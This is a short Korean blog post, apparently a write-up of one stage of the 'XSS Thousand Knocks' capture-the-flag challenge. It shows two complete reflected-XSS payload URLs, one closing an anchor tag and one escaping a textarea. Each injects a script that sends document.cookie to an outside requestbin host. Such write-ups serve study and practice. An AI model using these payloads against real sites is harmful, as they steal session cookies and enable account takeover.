여기서 시간 많이 썼다.
문제 3번이랑 비슷한데 똑같이 하면 안된다.
그래서 <a>태그를 닫아서 스크립트를 전달하면 ok가 뜬다.
http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='></a><script>location.href=%27http://requestbin.fullcontact.com/v9x9evv9?%27%2Bdocument.cookie</script>
이렇게 성공.
ps. 이거 textarea로 문제 풀 수 있던데, 어떻게 풀리는지 의문이다.
http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q=%22%3E%3C/textarea%3E%3Cscript%3Elocation.href=%27http://requestbin.fullcontact.com/v9x9evv9?a=%27%2Bdocument.cookie%3C/script%3E%3Ctextarea%3E
'WebHacking > XSS Thousand Knocks Write-Up' 카테고리의 다른 글
XSS Thousand Knocks Stage3 write up (0) | 2018.07.18 |
---|---|
XSS Thousand Knocks Stage2 write up (0) | 2018.07.18 |
XSS thousand Knocks stage1 writeup (0) | 2018.07.18 |